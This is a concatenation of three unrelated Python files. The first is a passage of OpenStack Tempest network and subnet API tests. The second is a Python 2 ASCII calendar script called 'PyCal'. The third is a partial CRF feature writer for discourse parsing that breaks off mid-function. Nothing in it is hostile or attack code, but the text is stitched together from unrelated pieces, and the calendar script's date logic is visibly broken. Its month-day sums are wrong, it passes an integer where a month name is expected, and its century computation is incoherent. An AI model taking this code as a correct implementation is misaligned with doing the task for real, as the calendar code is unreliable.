self.assertEqual(sorted(network.keys()), sorted(fields))
for field_name in fields:
self.assertEqual(network[field_name], self.network[field_name])
@test.attr(type='smoke')
@test.idempotent_id('f7ffdeda-e200-4a7a-bcbe-05716e86bf43')
def test_list_networks(self):
# Verify the network exists in the list of all networks
body = self.client.list_networks()
networks = [network['id'] for network in body['networks']
if network['id'] == self.network['id']]
self.assertNotEmpty(networks, "Created network not found in the list")
@test.attr(type='smoke')
@test.idempotent_id('6ae6d24f-9194-4869-9c85-c313cb20e080')
def test_list_networks_fields(self):
# Verify specific fields of the networks
fields = ['id', 'name', 'mtu']
body = self.client.list_networks(fields=fields)
networks = body['networks']
self.assertNotEmpty(networks, "Network list returned is empty")
for network in networks:
self.assertEqual(sorted(network.keys()), sorted(fields))
@test.attr(type='smoke')
@test.idempotent_id('bd635d81-6030-4dd1-b3b9-31ba0cfdf6cc')
def test_show_subnet(self):
# Verify the details of a subnet
body = self.client.show_subnet(self.subnet['id'])
subnet = body['subnet']
self.assertNotEmpty(subnet, "Subnet returned has no fields")
for key in ['id', 'cidr']:
self.assertIn(key, subnet)
self.assertEqual(subnet[key], self.subnet[key])
@test.attr(type='smoke')
@test.idempotent_id('270fff0b-8bfc-411f-a184-1e8fd35286f0')
def test_show_subnet_fields(self):
# Verify specific fields of a subnet
fields = ['id', 'network_id']
body = self.client.show_subnet(self.subnet['id'],
fields=fields)
subnet = body['subnet']
self.assertEqual(sorted(subnet.keys()), sorted(fields))
for field_name in fields:
self.assertEqual(subnet[field_name], self.subnet[field_name])
@test.attr(type='smoke')
@test.idempotent_id('db68ba48-f4ea-49e9-81d1-e367f6d0b20a')
def test_list_subnets(self):
# Verify the subnet exists in the list of all subnets
body = self.client.list_subnets()
subnets = [subnet['id'] for subnet in body['subnets']
if subnet['id'] == self.subnet['id']]
self.assertNotEmpty(subnets, "Created subnet not found in the list")
@test.attr(type='smoke')
@test.idempotent_id('842589e3-9663-46b0-85e4-7f01273b0412')
def test_list_subnets_fields(self):
# Verify specific fields of subnets
fields = ['id', 'network_id']
body = self.client.list_subnets(fields=fields)
subnets = body['subnets']
self.assertNotEmpty(subnets, "Subnet list returned is empty")
for subnet in subnets:
self.assertEqual(sorted(subnet.keys()), sorted(fields))
def _try_delete_network(self, net_id):
# delete network, if it exists
try:
self.client.delete_network(net_id)
# if network is not found, this means it was deleted in the test
except lib_exc.NotFound:
pass
@test.attr(type='smoke')
@test.idempotent_id('f04f61a9-b7f3-4194-90b2-9bcf660d1bfe')
def test_delete_network_with_subnet(self):
# Creates a network
name = data_utils.rand_name('network-')
body = self.client.create_network(name=name)
network = body['network']
net_id = network['id']
self.addCleanup(self._try_delete_network, net_id)
# Find a cidr that is not in use yet and create a subnet with it
subnet = self.create_subnet(network)
subnet_id = subnet['id']
# Delete network while the subnet still exists
body = self.client.delete_network(net_id)
# Verify that the subnet got automatically deleted.
self.assertRaises(lib_exc.NotFound, self.client.show_subnet,
subnet_id)
# Since create_subnet adds the subnet to the delete list, and it is
# is actually deleted here - this will create and issue, hence remove
# it from the list.
self.subnets.pop()
@test.attr(type='smoke')
@test.idempotent_id('d2d596e2-8e76-47a9-ac51-d4648009f4d3')
def test_create_delete_subnet_without_gateway(self):
self._create_verify_delete_subnet()
@test.attr(type='smoke')
@test.idempotent_id('9393b468-186d-496d-aa36-732348cd76e7')
def test_create_delete_subnet_with_gw(self):
self._create_verify_delete_subnet(
**self.subnet_dict(['gateway']))
@test.attr(type='smoke')
@test.idempotent_id('bec949c4-3147-4ba6-af5f-cd2306118404')
def test_create_delete_subnet_with_allocation_pools(self):
self._create_verify_delete_subnet(
**self.subnet_dict(['allocation_pools']))
@test.attr(type='smoke')
@test.idempotent_id('8217a149-0c6c-4cfb-93db-0486f707d13f')
def test_create_delete_subnet_with_gw_and_allocation_pools(self):
self._create_verify_delete_subnet(**self.subnet_dict(
['gateway', 'allocation_pools']))
@test.attr(type='smoke')
@test.idempotent_id('d830de0a-be47-468f-8f02-1fd996118289')
def test_create_delete_subnet_with_host_routes_and_dns_nameservers(self):
self._create_verify_delete_subnet(
**self.subnet_dict(['host_routes', 'dns_nameservers']))
@test.attr(type='smoke')
@test.idempotent_id('94ce038d-ff0a-4a4c-a56b-09da3ca0b55d')
def test_create_delete_subnet_with_dhcp_enabled(self):
self._create_verify_delete_subnet(enable_dhcp=True)
@test.attr(type='smoke')
@test.idempotent_id('3d3852eb-3009-49ec-97ac-5ce83b73010a')
def test_update_subnet_gw_dns_host_routes_dhcp(self):
network = self.create_network()
self.addCleanup(self._delete_network, network)
subnet = self.create_subnet(
network, **self.subnet_dict(['gateway', 'host_routes',
'dns_nameservers',
'allocation_pools']))
subnet_id = subnet['id']
new_gateway = str(netaddr.IPAddress(
self._subnet_data[self._ip_version]['gateway']) + 1)
# Verify subnet update
new_host_routes = self._subnet_data[self._ip_version][
'new_host_routes']
new_dns_nameservers = self._subnet_data[self._ip_version][
'new_dns_nameservers']
kwargs = {'host_routes': new_host_routes,
'dns_nameservers': new_dns_nameservers,
'gateway_ip': new_gateway, 'enable_dhcp': True}
new_name = "New_subnet"
body = self.client.update_subnet(subnet_id, name=new_name,
**kwargs)
updated_subnet = body['subnet']
kwargs['name'] = new_name
self.assertEqual(sorted(updated_subnet['dns_nameservers']),
sorted(kwargs['dns_nameservers']))
del subnet['dns_nameservers'], kwargs['dns_nameservers']
self._compare_resource_attrs(updated_subnet, kwargs)
@test.attr(type='smoke')
@test.idempotent_id('a4d9ec4c-0306-4111-a75c-db01a709030b')
def test_create_delete_subnet_all_attributes(self):
self._create_verify_delete_subnet(
enable_dhcp=True,
**self.subnet_dict(['gateway', 'host_routes', 'dns_nameservers']))
@test.attr(type='smoke')
@test.idempotent_id('af774677-42a9-4e4b-bb58-16fe6a5bc1ec')
def test_external_network_visibility(self):
"""Verifies user can see external networks but not subnets."""
body = self.client.list_networks(**{'router:external': True})
networks = [network['id'] for network in body['networks']]
self.assertNotEmpty(networks, "No external networks found")
nonexternal = [net for net in body['networks'] if
not net['router:external']]
self.assertEmpty(nonexternal, "Found non-external networks"
" in filtered list (%s)." % nonexternal)
self.assertIn(CONF.network.public_network_id, networks)
subnets_iter = (network['subnets'] for network in body['networks'])
# subnets_iter is a list (iterator) of lists. This flattens it to a
# list of UUIDs
public_subnets_iter = itertools.chain(*subnets_iter)
body = self.client.list_subnets()
subnets = [sub['id'] for sub in body['subnets']
if sub['id'] in public_subnets_iter]
self.assertEmpty(subnets, "Public subnets visible")
class BulkNetworkOpsTestJSON(base.BaseNetworkTest):
"""
Tests the following operations in the Neutron API using the REST client for
Neutron:
bulk network creation
bulk subnet creation
bulk port creation
list tenant's networks
v2.0 of the Neutron API is assumed. It is also assumed that the following
options are defined in the [network] section of etc/tempest.conf:
tenant_network_cidr with a block of cidr's from which smaller blocks
can be allocated for tenant networks
tenant_network_mask_bits with the mask bits to be used to partition the
block defined by tenant-network_cidr
"""
def _delete_networks(self, created_networks):
for n in created_networks:
self.client.delete_network(n['id'])
# Asserting that the networks are not found in the list after deletion
body = self.client.list_networks()
networks_list = [network['id'] for network in body['networks']]
for n in created_networks:
self.assertNotIn(n['id'], networks_list)
def _delete_subnets(self, created_subnets):
for n in created_subnets:
self.client.delete_subnet(n['id'])
# Asserting that the subnets are not found in the list after deletion
body = self.client.list_subnets()
subnets_list = [subnet['id'] for subnet in body['subnets']]
for n in created_subnets:
self.assertNotIn(n['id'], subnets_list)
def _delete_ports(self, created_ports):
for n in created_ports:
self.client.delete_port(n['id'])
# Asserting that the ports are not found in the list after deletion
body = self.client.list_ports()
ports_list = [port['id'] for port in body['ports']]
for n in created_ports:
self.assertNotIn(n['id'], ports_list)
@test.attr(type='smoke')
@test.idempotent_id('d4f9024d-1e28-4fc1-a6b1-25dbc6fa11e2')
def test_bulk_create_delete_network(self):
# Creates 2 networks in one request
network_names = [data_utils.rand_name('network-'),
data_utils.rand_name('network-')]
body = self.client.create_bulk_network(network_names)
created_networks = body['networks']
self.addCleanup(self._delete_networks, created_networks)
# Asserting that the networks are found in the list after creation
body = self.client.list_networks()
networks_list = [network['id'] for network in body['networks']]
for n in created_networks:
self.assertIsNotNone(n['id'])
self.assertIn(n['id'], networks_list)
@test.attr(type='smoke')
@test.idempotent_id('8936533b-c0aa-4f29-8e53-6cc873aec489')
def test_bulk_create_delete_subnet(self):
networks = [self.create_network(), self.create_network()]
# Creates 2 subnets in one request
if self._ip_version == 4:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_cidr)
mask_bits = CONF.network.tenant_network_mask_bits
else:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
mask_bits = CONF.network.tenant_network_v6_mask_bits
cidrs = [subnet_cidr for subnet_cidr in cidr.subnet(mask_bits)]
names = [data_utils.rand_name('subnet-') for i in range(len(networks))]
subnets_list = []
for i in range(len(names)):
p1 = {
'network_id': networks[i]['id'],
'cidr': str(cidrs[(i)]),
'name': names[i],
'ip_version': self._ip_version
}
subnets_list.append(p1)
del subnets_list[1]['name']
body = self.client.create_bulk_subnet(subnets_list)
created_subnets = body['subnets']
self.addCleanup(self._delete_subnets, created_subnets)
# Asserting that the subnets are found in the list after creation
body = self.client.list_subnets()
subnets_list = [subnet['id'] for subnet in body['subnets']]
for n in created_subnets:
self.assertIsNotNone(n['id'])
self.assertIn(n['id'], subnets_list)
@test.attr(type='smoke')
@test.idempotent_id('48037ff2-e889-4c3b-b86a-8e3f34d2d060')
def test_bulk_create_delete_port(self):
networks = [self.create_network(), self.create_network()]
# Creates 2 ports in one request
names = [data_utils.rand_name('port-') for i in range(len(networks))]
port_list = []
state = [True, False]
for i in range(len(names)):
p1 = {
'network_id': networks[i]['id'],
'name': names[i],
'admin_state_up': state[i],
}
port_list.append(p1)
del port_list[1]['name']
body = self.client.create_bulk_port(port_list)
created_ports = body['ports']
self.addCleanup(self._delete_ports, created_ports)
# Asserting that the ports are found in the list after creation
body = self.client.list_ports()
ports_list = [port['id'] for port in body['ports']]
for n in created_ports:
self.assertIsNotNone(n['id'])
self.assertIn(n['id'], ports_list)
class BulkNetworkOpsIpV6TestJSON(BulkNetworkOpsTestJSON):
_ip_version = 6
class NetworksIpV6TestJSON(NetworksTestJSON):
_ip_version = 6
@test.attr(type='smoke')
@test.idempotent_id('e41a4888-65a6-418c-a095-f7c2ef4ad59a')
def test_create_delete_subnet_with_gw(self):
net = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
gateway = str(netaddr.IPAddress(net.first + 2))
name = data_utils.rand_name('network-')
network = self.create_network(network_name=name)
subnet = self.create_subnet(network, gateway)
# Verifies Subnet GW in IPv6
self.assertEqual(subnet['gateway_ip'], gateway)
@test.attr(type='smoke')
@test.idempotent_id('ebb4fd95-524f-46af-83c1-0305b239338f')
def test_create_delete_subnet_with_default_gw(self):
net = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
gateway_ip = str(netaddr.IPAddress(net.first + 1))
name = data_utils.rand_name('network-')
network = self.create_network(network_name=name)
subnet = self.create_subnet(network)
# Verifies Subnet GW in IPv6
self.assertEqual(subnet['gateway_ip'], gateway_ip)
@test.attr(type='smoke')
@test.idempotent_id('a9653883-b2a4-469b-8c3c-4518430a7e55')
def test_create_list_subnet_with_no_gw64_one_network(self):
name = data_utils.rand_name('network-')
network = self.create_network(name)
ipv6_gateway = self.subnet_dict(['gateway'])['gateway']
subnet1 = self.create_subnet(network,
ip_version=6,
gateway=ipv6_gateway)
self.assertEqual(netaddr.IPNetwork(subnet1['cidr']).version, 6,
'The created subnet is not IPv6')
subnet2 = self.create_subnet(network,
gateway=None,
ip_version=4)
self.assertEqual(netaddr.IPNetwork(subnet2['cidr']).version, 4,
'The created subnet is not IPv4')
# Verifies Subnet GW is set in IPv6
self.assertEqual(subnet1['gateway_ip'], ipv6_gateway)
# Verifies Subnet GW is None in IPv4
self.assertEqual(subnet2['gateway_ip'], None)
# Verifies all 2 subnets in the same network
body = self.client.list_subnets()
subnets = [sub['id'] for sub in body['subnets']
if sub['network_id'] == network['id']]
test_subnet_ids = [sub['id'] for sub in (subnet1, subnet2)]
self.assertItemsEqual(subnets,
test_subnet_ids,
'Subnet are not in the same network')
class NetworksIpV6TestAttrs(NetworksIpV6TestJSON):
@classmethod
def resource_setup(cls):
if not CONF.network_feature_enabled.ipv6_subnet_attributes:
raise cls.skipException("IPv6 extended attributes for "
"subnets not available")
super(NetworksIpV6TestAttrs, cls).resource_setup()
@test.attr(type='smoke')
@test.idempotent_id('da40cd1b-a833-4354-9a85-cd9b8a3b74ca')
def test_create_delete_subnet_with_v6_attributes_stateful(self):
self._create_verify_delete_subnet(
gateway=self._subnet_data[self._ip_version]['gateway'],
ipv6_ra_mode='dhcpv6-stateful',
ipv6_address_mode='dhcpv6-stateful')
@test.attr(type='smoke')
@test.idempotent_id('176b030f-a923-4040-a755-9dc94329e60c')
def test_create_delete_subnet_with_v6_attributes_slaac(self):
self._create_verify_delete_subnet(
ipv6_ra_mode='slaac',
ipv6_address_mode='slaac')
@test.attr(type='smoke')
@test.idempotent_id('7d410310-8c86-4902-adf9-865d08e31adb')
def test_create_delete_subnet_with_v6_attributes_stateless(self):
self._create_verify_delete_subnet(
ipv6_ra_mode='dhcpv6-stateless',
ipv6_address_mode='dhcpv6-stateless')
def _test_delete_subnet_with_ports(self, mode):
"""Create subnet and delete it with existing ports"""
slaac_network = self.create_network()
subnet_slaac = self.create_subnet(slaac_network,
**{'ipv6_ra_mode': mode,
'ipv6_address_mode': mode})
port = self.create_port(slaac_network)
self.assertIsNotNone(port['fixed_ips'][0]['ip_address'])
self.client.delete_subnet(subnet_slaac['id'])
self.subnets.pop()
subnets = self.client.list_subnets()
subnet_ids = [subnet['id'] for subnet in subnets['subnets']]
self.assertNotIn(subnet_slaac['id'], subnet_ids,
"Subnet wasn't deleted")
self.assertRaisesRegexp(
lib_exc.Conflict,
"There are one or more ports still in use on the network",
self.client.delete_network,
slaac_network['id'])
@test.attr(type='smoke')
@test.idempotent_id('88554555-ebf8-41ef-9300-4926d45e06e9')
def test_create_delete_slaac_subnet_with_ports(self):
"""Test deleting subnet with SLAAC ports
Create subnet with SLAAC, create ports in network
and then you shall be able to delete subnet without port
deletion. But you still can not delete the network.
"""
self._test_delete_subnet_with_ports("slaac")
@test.attr(type='smoke')
@test.idempotent_id('2de6ab5a-fcf0-4144-9813-f91a940291f1')
def test_create_delete_stateless_subnet_with_ports(self):
"""Test deleting subnet with DHCPv6 stateless ports
Create subnet with DHCPv6 stateless, create ports in network
and then you shall be able to delete subnet without port
deletion. But you still can not delete the network.
"""
self._test_delete_subnet_with_ports("dhcpv6-stateless")
| |
#!/bin/python
import sys;
import random;
import os;
def menu():
print "Welcome to PyCal";
print "===========================================================";
print "Author : Abel Gancsos";
print "Version : 1.0.1";
print "Description: This application will generate an ASCII";
print " calendar for the user-given calendar, month,";
print " and year. It can also list the days of the";
print " month in a text table form.";
print "Purpose : The purpose of this application was to write";
print " an applicaiton using date algorithms using";
print " two custom Python classes.";
print "===========================================================";
print "\n===========================================================";
print "Usage:"
print "python pycal.py [-h|-help|-n|-y|-m";
print "Flags:";
print "-h|-help: help";
print "-n: name of the calendar";
print "-m: full month name";
print "-y: YYYY";
print "-d: display (text|ASCII|both->default)";
print "--no-headers: don't print the headers";
print "===========================================================";
print "\n===========================================================";
print "Notes:"
print "+YOU MUST PROVIDE AT LEAST ONE FLAG!!!!!!!!!!!!!!!!!!!!!!!!";
print "+At this time the ASCII representation only prints the first";
print " day and days that match the 7 day sequence.";
print "===========================================================";
class day:
days_str="Sunday,Monday,Tuesday,Wednesday,Thursday,Friday,Saturday";
days=days_str.split(",");
def get_doy(self,month):
final=0;
if month=="January":
final+=self.num_value;
if month=="February":
final=final+31+self.num_value;
if month=="March":
final=final+31+28+self.num_value;
if month=="April":
final=final+31+28+31+self.num_value;
if month=="May":
final=final+31+28+31+30+self.num_value;
if month=="June":
final=final+31+28+31+30+31+self.num_value;
if month=="July":
final=final+31+28+31+30+31+30+self.num_value;
if month=="August":
final=final+31+28+31+30+31+30+31+self.num_value;
if month=="September":
final=final+31+28+31+30+31+30+31+31+self.num_value;
if month=="October":
final=final+31+28+31+30+31+30+31+31+30+self.num_value;
if month=="November":
final=final+30+28+31+30+31+30+31+31+30+31+self.num_value;
if month=="December":
final=final+30+28+31+30+31+30+31+31+30+31+30+self.num_value;
return final;
def left_pad(self,mstring,mlen,mchar):
final="";
i=len(mstring);
while i<mlen:
final+=mchar;
i+=1;
return final+mstring;
def right_pad(self,mstring,mlen,mchar):
final="";
i=len(mstring);
while i<mlen:
final+=mchar;
i+=1;
return mstring+final;
def get_dow(self,num_value,month,year):
monthTable=0;
leap=0;
if(year%4==0):
leap=1;
if(month==1):
if(leap==1):
monthTable=-1;
else:
monthTable=2;
if(month==2):
if(leap==1):
monthTable=2;
else:
monthTable=3;
if(month==3):
monthTable=3;
if(month==4):
monthTable=6;
if(month==5):
monthTable=1;
if(month==6):
monthTable=4;
if(month==7):
monthTable=6;
if(month==8):
monthTable=2;
if(month==9):
monthTable=5;
if(month==10):
monthTable=0;
if(month==11):
monthTable=3;
if(month==12):
monthTable=5;
div_str="";
div_str+=str(year)[2];
div_str+=str(year)[3];
yr=int(float(div_str));
final=num_value+monthTable+yr+(yr/4)+self.get_century(year);
return self.days[final%7];
def get_century(self,year):
div_str="";
div_str+=str(year)[0];
div_str+=str(year)[1];
yr=int(float(div_str));
if yr%4==0:
return 6;
else:
final=0;
i=4;
while yr%4!=0:
i/=2;
yr+=1;
return final;
return 0;
def __init__(self,num_value):
self.id=self.left_pad(str(random.randint(1,9999)),8,"0");
self.num_value=num_value;
self.str_value=self.days[self.num_value/7-1];
self.doy=self.get_doy(self.num_value);
class calendar:
def __init__(self,name,month,year):
self.id=day(1).left_pad(str(random.randint(1,9999)),8,"0");
self.name=name;
self.month=month;
self.year=year;
self.num_of_days=self.get_num_days();
if self.year%4==0:
self.leap_year=1;
else:
self.leap_year=0;
def get_num_days(self):
if self.month=="January":
return 31;
if self.month=="February":
return 28;
if self.month=="March":
return 31;
if self.month=="April":
return 30;
if self.month=="May":
return 31;
if self.month=="June":
return 30;
if self.month=="July":
return 31;
if self.month=="August":
return 31;
if self.month=="September":
return 30;
if self.month=="October":
return 31;
if self.month=="November":
return 30;
if self.month=="December":
return 31;
else:
return 0;
def num_month(self,month):
if self.month=="January":
return 1;
if self.month=="February":
return 2;
if self.month=="March":
return 3;
if self.month=="April":
return 4;
if self.month=="May":
return 5;
if self.month=="June":
return 6;
if self.month=="July":
return 7;
if self.month=="August":
return 8;
if self.month=="September":
return 9;
if self.month=="October":
return 10;
if self.month=="November":
return 11;
if self.month=="December":
return 12;
else:
return 0;
def print_header(self):
print day(1).right_pad("",80,"=");
print "ID: "+self.id;
print "Name: "+self.name;
print "Month: "+self.month;
print "Year: "+str(self.year);
print "Leap Year: "+str(self.leap_year);
print "Number of Days: "+str(self.num_of_days);
print day(1).right_pad("",80,"=");
def print_text_calendar(self):
print day(1).right_pad("",80,"=");
print "|"+day(1).right_pad("Day",10," ")+"|"+day(1).right_pad("DOW",10," ")+"|"+day(1).right_pad("DOY",10," ")+"|";
print day(1).right_pad("",80,"=");
i=1;
while i<=self.num_of_days:
current_day=day(i);
print current_day.right_pad(str(i),12," ")+current_day.right_pad(current_day.get_dow(i,self.num_month(self.month),self.year),12," ")+str(current_day.get_doy(self.month));
i+=1;
print day(1).right_pad("",80,"=");
def print_calendar(self):
print day(1).right_pad("",80,"=");
sys.stdout.write("|");
for full_day in day(1).days:
sys.stdout.write(day(1).right_pad(full_day,10," ")+"|");
print;
print day(1).right_pad("",80,"=");
i=1;
day_index=1;
while i<=self.num_of_days:
current_day=day(day_index%7);
j=0;
days=current_day.days;
sys.stdout.write("|");
while j<len(days):
if current_day.get_dow(day_index/7,self.num_month(self.month),self.year)==days[j-1]:
sys.stdout.write(current_day.right_pad(str(i),10," ")+"|");
else:
sys.stdout.write(current_day.right_pad("",10," ")+"|");
j+=1;
print;
i+=7;
day_index+=1;
print day(1).right_pad("",80,"=");
##int main
name="Default Name";
month="January";
year=2014;
display="both";
headers=1;
if len(sys.argv) > 1:
if sys.argv[1]=="-h" or sys.argv[1]=="-help":
menu();
else:
i=1;
while i<len(sys.argv):
if sys.argv[i]=="-n":
name=sys.argv[i+1];
if sys.argv[i]=="-m":
month=sys.argv[i+1];
if sys.argv[i]=="-y":
year=int(sys.argv[i+1]);
if sys.argv[i]=="-d":
display=sys.argv[i+1];
if sys.argv[i]=="--no-headers":
headers=0;
i+=1;
my_cal=calendar(name,month,year);
if headers==1:
my_cal.print_header();
if display=="text":
my_cal.print_text_calendar();
if display=="ASCII":
my_cal.print_calendar();
if display=="both":
my_cal.print_text_calendar();
my_cal.print_calendar();
else:
menu();
###################################################
| |
'''
Created on 2013-12-22
@author: Wei
'''
import utils.serialize
from utils.rst_lib import *
class CRFTreeFeatureWriter:
def __init__(self, verbose):
self.features = set()
self.verbose = verbose
self.cue_phrases = utils.serialize.loadData('cue_phrases')
if self.verbose:
print 'Loaded %d cue phrases for CRF labeling' % len(self.cue_phrases)
def write_organization_features(self, constituent, scope, unit, position):
'''
1. number of EDUs in unit1 or unit2.
2. number of tokens in unit1 or unit2.
3. distance of unit1 in EDUs to the beginning (or to the end) of the sentence.
4. distance of unit2 in EDUs to the beginning (or to the end) of the sentence.
'''
num_edus = constituent.get_num_edus()
if scope:
assert constituent.start_sent_id == constituent.end_sent_id
start_edu_offset = constituent.l_start - constituent.doc.sentences[constituent.start_sent_id].start_edu
end_edu_offset = constituent.doc.sentences[constituent.end_sent_id].end_edu - constituent.r_end
if start_edu_offset == 0:
self.features.add("First_EDU_Unit%d@%d" % (unit, position))
if end_edu_offset == 0:
self.features.add("Last_EDU_Unit%d@%d" % (unit,position))
subtree_height = constituent.get_subtree_height()
if subtree_height == 1:
self.features.add('Bottom_Level_Subtree_Unit%d@%d' % (unit, position))
return num_edus, subtree_height
def write_Ngram_features(self, constituent, unit, position):
'''
N = 1, 2, 3
1. Beginning (or end) lexical N-grams in unit 1.
2. Beginning (or end) lexical N-grams in unit 2.
3. Beginning (or end) POS N-grams in unit 1.
4. Beginning (or end) POS N-grams in unit 2.
'''
for n in range(1, 4):
# if self.verbose:
# print 'stump', stump
# print breaks
# print offset
# print
pref_PoS_ngrams = constituent.get_POS_ngram(n)
self.features.add('Beginning_POS_%d-grams_Unit%d=%s@%d' % (n, unit, '-'.join(pref_PoS_ngrams), position))
pref_lexical_ngrams = constituent.get_ngram(n)
self.features.add('Beginning_Lexical_%d-grams_Unit%d=%s@%d' % (n, unit, '-'.join(pref_lexical_ngrams), position))
end_lexical_ngrams = constituent.get_ngram(-n)
self.features.add('End_Lexical_Lexical_%d-grams_Unit%d=%s@%d' % (n, unit, '-'.join(end_lexical_ngrams), position))
end_PoS_ngrams = constituent.get_POS_ngram(-n)
self.features.add('End_POS_%d-grams_Unit%d=%s@%d' % (n, unit, '-'.join(end_PoS_ngrams), position))
def write_dominance_set_features(self, L, R, position):
assert L.doc == R.doc
l_start_sent = L.start_sent_id
l_start_word = L.start_word
l_end_sent = L.end_sent_id
l_end_word = L.end_word
r_start_sent = R.start_sent_id
r_start_word = R.start_word
r_end_sent = R.end_sent_id
r_end_word = R.end_word
l_subtrees_top_tags = []
if l_start_sent == l_end_sent:
t = L.doc.sentences[l_start_sent].parse_tree
l_ancestor_pos = t.treeposition_spanning_leaves(l_start_word, l_end_word)
if l_end_word == l_start_word + 1:
l_ancestor_pos = l_ancestor_pos[ : -1]
l_ancestor_subtree = t[l_ancestor_pos]
self.features.add('Top_syntactic_tag_Unit1=%s@%d' % (l_ancestor_subtree.label(), position))
if len(l_ancestor_subtree.leaves()) == l_end_word - l_start_word:
self.features.add('Valid_syntax_subtree_Unit1@%d' % position)
l_subtrees = utils.utils.get_syntactic_subtrees(t, l_start_word, l_end_word)
self.features.add('Num_Syntax_subtrees_Unit1=%d@%d' % (len(l_subtrees), position))
if len(l_subtrees) == 1:
self.features.add('Top_Syntax_tag_Unit1=%s@%d' % (l_subtrees[0].label(), position))
l_subtree_top_tags = []
for (i, subtree) in enumerate(l_subtrees):
l_subtree_top_tags.append(subtree.label())
l_subtrees_top_tags.append(l_subtree_top_tags)
else:
l_ancestor_pos = ()
r_subtrees_top_tags = []
if r_start_sent == r_end_sent:
t = R.doc.sentences[r_start_sent].parse_tree
r_ancestor_pos = t.treeposition_spanning_leaves(r_start_word, r_end_word)
if r_end_word == r_start_word + 1:
r_ancestor_pos = r_ancestor_pos[ : -1]
r_ancestor_subtree = t[r_ancestor_pos]
self.features.add('Top_syntactic_tag_Unit2=%s@%d' % (r_ancestor_subtree.label(), position))
if len(r_ancestor_subtree.leaves()) == r_end_word - r_start_word:
self.features.add('Valid_syntax_subtree_Unit2@%d' % position)
r_subtrees = utils.utils.get_syntactic_subtrees(t, r_start_word, r_end_word)
self.features.add('Num_Syntax_subtrees_Unit2=%d@%d' % (len(r_subtrees), position))
if len(r_subtrees) == 1:
self.features.add('Top_Syntax_tag_Unit2=%s@%d' % (r_subtrees[0].label(), position))
r_subtree_top_tags = []
for (i, subtree) in enumerate(r_subtrees):
r_subtree_top_tags.append(subtree.label())
r_subtrees_top_tags.append(r_subtree_top_tags)
else:
r_ancestor_pos = ()
min_top_tags_edit_distance = 1.0
for l_top_tags in l_subtrees_top_tags:
for r_top_tags in r_subtrees_top_tags:
distance = utils.utils.compute_edit_distance(l_top_tags, r_top_tags)
distance_norm = distance * 1.0 / max(len(l_top_tags), len(r_top_tags))
min_top_tags_edit_distance = min(min_top_tags_edit_distance, distance_norm)
self.features.add('Min_Subtrees_Top_Syntactic_Tags_Distance=%.3f@%d' % (min_top_tags_edit_distance,
position))
if l_start_sent != r_end_sent:
return
t = L.doc.sentences[l_start_sent].parse_tree
common_ancestor_pos = common_ancestor(l_ancestor_pos, r_ancestor_pos)
dist_ancestor_l = len(l_ancestor_pos) - len(common_ancestor_pos)
dist_ancestor_r = len(r_ancestor_pos) - len(common_ancestor_pos)
if dist_ancestor_l:
head = filter_lexical_head(t.get_head(l_ancestor_pos))
self.features.add('Top_lexical_head_Unit1=%s@%d' % (head, position))
self.features.add('Dist_ancestor_norm_Unit1=%s@%d' % (dist_ancestor_l/float(len(common_ancestor_pos)), position))
if dist_ancestor_r:
head = filter_lexical_head(t.get_head(r_ancestor_pos))
self.features.add('Top_lexical_head_Unit2=%s@%d' % (head, position))
self.features.add('Dist_ancestor_norm_Unit2=%s@%d' % (dist_ancestor_l/float(len(common_ancestor_pos)), position))
if common_ancestor_pos:
syntax_tree = t
head_pos = syntax_tree[common_ancestor_pos].head
if head_pos >= l_end_word:
self.features.add('Head_in_R@%d' % position)
else:
self.features.add('Head_in_L@%d' % position)
if dist_ancestor_l == 0 or dist_ancestor_r == 0:
if dist_ancestor_l == 0:# L >> R
self.features.add('L_Dominates_R@%d' % position)
dom_pos = r_ancestor_pos[:-1]
else: # R >> L
self.features.add('R_Dominates_L@%d' % position)
dom_pos = l_ancestor_pos[:-1]
head = filter_lexical_head(syntax_tree.get_head(dom_pos))
# if head and head in self.lexical_heads:
if head:
self.features.add('Dominated_lexical_head=%s@%d' % (head, position))
tag = filter_syntactic_tag(syntax_tree.get_syntactic_tag(dom_pos))
if tag :
self.features.add('Dominated_Syntactic_tag=%s@%d' % (tag, position))
def write_substructure_features(self, constituent, unit = 1, position = 0):
self.features.add("Unit%d_Subtree_Rel_Root=%s@%d" % (unit, constituent.get_subtree_rel(), position))
def write_text_structureal_features(self, constituent, unit, position):
'''
Number of sentences in unit 1 (or unit 2).
'''
start_sent = constituent.start_sent_id
end_sent = constituent.end_sent_id
if start_sent == 0:
self.features.add('First_Sentence_Unit%d@%d' % (unit, position))
if end_sent == len(constituent.doc.sentences) - 1:
self.features.add('Last_Sentence_Unit%d@%d' % (unit, position))
num_sents = end_sent - start_sent + 1
num_paragraphs = 0
for i in range(constituent.l_start, constituent.r_end):
# print constituent.doc.edus[i]
if constituent.doc.edus[i][-1] == '<P>':
num_paragraphs += 1
return num_sents, num_paragraphs
def write_cue_phrase_features(self, constituent, unit = 1, position = 0):
if not constituent.is_leaf():
edus = [constituent.doc.edus[constituent.l_start], constituent.doc.edus[constituent.r_end - 1]]
else:
edus = [constituent.doc.edus[constituent.l_start]]
candidates = []
for edu in edus:
candidates.append(' ' + ' '.join(edu).lower().replace('<s>', '').replace('<p>', '') + ' ')
for cue_phrase in self.cue_phrases:
for (i, cand_span) in enumerate(candidates):
cue_position = 'Beginning' if i == 0 else 'Ending'
pos = cand_span.find(" " + cue_phrase + " ")
if pos >= 0:
if i == 0 and pos < 3:
self.features.add('Unit%d_%s_Cue_Phrase=%s@%d' % (unit, cue_position, cue_phrase.replace(' ', '#'), position))
elif i == 1 and cand_span[pos : ].split(' ') <= 3:
self.features.add('Unit%d_%s_Cue_Phrase=%s@%d' % (unit, cue_position, cue_phrase.replace(' ', '#'), position))
def write_features_for_constituents(self, constituents, positions, scope, labeling):
self.features.clear()
for (i, position) in enumerate(positions):
L = constituents[i]
R = constituents[i + 1]
if L and R:
# print 'c1:', constituent1.print_span(), 'c2:', constituent2.print_span()
l_subtree_height, l_num_edus = self.write_organization_features(L, scope, 1, position)
r_subtree_height, r_num_edus = self.write_organization_features(R, scope, 2, position)
if l_subtree_height < r_subtree_height:
self.features.add('L_Lower_Subtree_Height_Than_R@%d' % position)
elif r_subtree_height < l_subtree_height:
self.features.add('R_Lower_Subtree_Height_Than_L@%d' % position)
else:
self.features.add('L_R_Same_Subtree_Height@%d' % position)
if l_num_edus < r_num_edus:
self.features.add('L_Fewer_EDUs_Than_R@%d' % position)
